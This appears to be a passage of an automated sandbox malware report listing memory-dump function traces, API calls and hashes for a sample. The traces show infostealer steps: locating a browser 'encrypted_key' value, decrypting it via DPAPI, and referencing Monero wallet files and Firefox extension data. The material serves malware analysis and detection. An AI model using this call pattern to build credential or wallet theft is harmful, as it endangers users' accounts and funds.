                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: 8367bf9739a61ad69fcce4d4d6f4dd0bbe557cb05588892633ee7b62c907b349
                                        • Instruction ID: 9f2bfd2d91f9c73a7666ddc3ff0a483bf4de027cf998683a801bf60e424c849b
                                        • Opcode Fuzzy Hash: 8367bf9739a61ad69fcce4d4d6f4dd0bbe557cb05588892633ee7b62c907b349
                                        • Instruction Fuzzy Hash: 5C510F72D102189BCB04FBA4EDA6DED77B9AF54300F489578F81777191EE346A08CB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 95f989fb2b27ab26a34e32d9b6b841c8b41c1067e193cd93bb1ff0f48302a991
                                        • Instruction ID: 06b3bb232c33d033451947e3cd9275383882d9da17ad9dc7508285469407ec8f
                                        • Opcode Fuzzy Hash: 95f989fb2b27ab26a34e32d9b6b841c8b41c1067e193cd93bb1ff0f48302a991
                                        • Instruction Fuzzy Hash: 7F417371E002199FCB18EFB4E855AEEB7B8AF54304F049028F5167B185EB74AA45CF91
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                          • Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                          • Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                          • Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                          • Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                          • Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                          • Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E1A489
                                          • Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A23F
                                          • Part of subcall function 00E1A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E14F3E,00000000,?), ref: 00E1A251
                                          • Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A27A
                                          • Part of subcall function 00E1A210: LocalFree.KERNEL32(?,?,?,?,00E14F3E,00000000,?), ref: 00E1A28F
                                          • Part of subcall function 00E1A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E1A2D4
                                          • Part of subcall function 00E1A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E1A2F3
                                          • Part of subcall function 00E1A2B0: LocalFree.KERNEL32(?), ref: 00E1A323
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: 537d829f36db752d0a41dc81138c9f54e0fb1883bcf5652724a622482c24fc59
                                        • Instruction ID: 84da31763fcb771825ae63ff5b1fc5976108cbe67f11f6d236aa2d73d2ce2bf2
                                        • Opcode Fuzzy Hash: 537d829f36db752d0a41dc81138c9f54e0fb1883bcf5652724a622482c24fc59
                                        • Instruction Fuzzy Hash: E23152B6D01209ABCF04DB94DD45AFFB7B9AF58344F085568E901B7241E7319E44CBA1
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E305BF), ref: 00E2885A
                                        • Process32First.KERNEL32(?,00000128), ref: 00E2886E
                                        • Process32Next.KERNEL32(?,00000128), ref: 00E28883
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • CloseHandle.KERNEL32(?), ref: 00E288F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: 38815df0af89d54d3b434743d492db40f311a1b2a9b009abb9823463059dab31
                                        • Instruction ID: 88eed0d9c8d4584ffaaa926648a2907a0f92150e17fddb49cc88d8fd470c47ab
                                        • Opcode Fuzzy Hash: 38815df0af89d54d3b434743d492db40f311a1b2a9b009abb9823463059dab31
                                        • Instruction Fuzzy Hash: A5318D71901228ABCB24DF95ED52FEEB7B8FF04700F5441A9F10AB6190DB306A44CFA1
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E8FE13
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E8FE2C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction ID: 2f929bb7a391d3ff25ecba40bd61cca947171eb8c62abbea80c78b1bb460ea31
                                        • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction Fuzzy Hash: 9C01D432609726EEFE3436745CC99A73694EB017B97305379F21EA01F2EF924C419240
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E30DE8,00000000,?), ref: 00E27B40
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27B47
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00E30DE8,00000000,?), ref: 00E27B54
                                        • wsprintfA.USER32 ref: 00E27B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 3bbfe9f50bbe0c81566e2444b8797d85135c280d449529b6bfda5846787fd469
                                        • Instruction ID: ed519855a73d7948463fd34376229ab2b41c3f45d7695535ac83daebb2b41110
                                        • Opcode Fuzzy Hash: 3bbfe9f50bbe0c81566e2444b8797d85135c280d449529b6bfda5846787fd469
                                        • Instruction Fuzzy Hash: BE113CB2904218ABCB24DFCAED45BBEBBF8FB4CB11F10411AF645A6284D3395940C7B0
                                        APIs
                                        • __getptd.LIBCMT ref: 00E2CA7E
                                          • Part of subcall function 00E2C2A0: __amsg_exit.LIBCMT ref: 00E2C2B0
                                        • __getptd.LIBCMT ref: 00E2CA95
                                        • __amsg_exit.LIBCMT ref: 00E2CAA3
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00E2CAC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 376c6e0c232175c7f904ec08b183ddc85161dccb9f1757fe6c750e8c0c0d4124
                                        • Instruction ID: b5039f36480d9c156ceaabb47e625f4c36b7107346e14b6c9d8bc05ed6827b79
                                        • Opcode Fuzzy Hash: 376c6e0c232175c7f904ec08b183ddc85161dccb9f1757fe6c750e8c0c0d4124
                                        • Instruction Fuzzy Hash: A1F06773944738DBD620FBA8F806B4E37E0AF00724F30314AE507B62E2CB6459808B96
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch
                                        • String ID: MOC$RCC
                                        • API String ID: 78271584-2084237596
                                        • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction ID: dd0f7aa9a762ebe7e25aebd1cfc48575c1d8e8952f4f583fd639b8bf0d9f6191
                                        • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction Fuzzy Hash: 15415871900209EFCF25DF98DC81AAEBBB5EF48304F599199FA0876251D3359A90DF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: T8
                                        • API String ID: 0-1243456643
                                        • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                        • Instruction ID: cbd5733198006f98867c2fb86eb96e52c7e5a26a5da37156339eef07932e74a7
                                        • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                        • Instruction Fuzzy Hash: 61216DF1600205BF9F20AFB1C8C18AB77E9AF04368714661AFA25A7651E731EE4087A0
                                        APIs
                                          • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E251CA
                                        • lstrcat.KERNEL32(?,00E31058), ref: 00E251E7
                                        • lstrcat.KERNEL32(?,01A88AB8), ref: 00E251FB
                                        • lstrcat.KERNEL32(?,00E3105C), ref: 00E2520D
                                          • Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24B7C
                                          • Part of subcall function 00E24B60: FindFirstFileA.KERNEL32(?,?), ref: 00E24B93
                                          • Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E24BC1
                                          • Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24BD7
                                          • Part of subcall function 00E24B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E24DCD
                                          • Part of subcall function 00E24B60: FindClose.KERNEL32(000000FF), ref: 00E24DE2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 07a3a0ac3e10326ec898511f729aea80042034c5f712d865640fa57a7ec572e5
                                        • Instruction ID: 12544aa8caf3deda88e881d4a20ddfa7824d763df5b56e7eaf64fa4a3f78c7a2
                                        • Opcode Fuzzy Hash: 07a3a0ac3e10326ec898511f729aea80042034c5f712d865640fa57a7ec572e5
                                        • Instruction Fuzzy Hash: 20212FB6900208A7C724F770FC46EED33BC9B54700F404598F685A6185EE7596C8CF91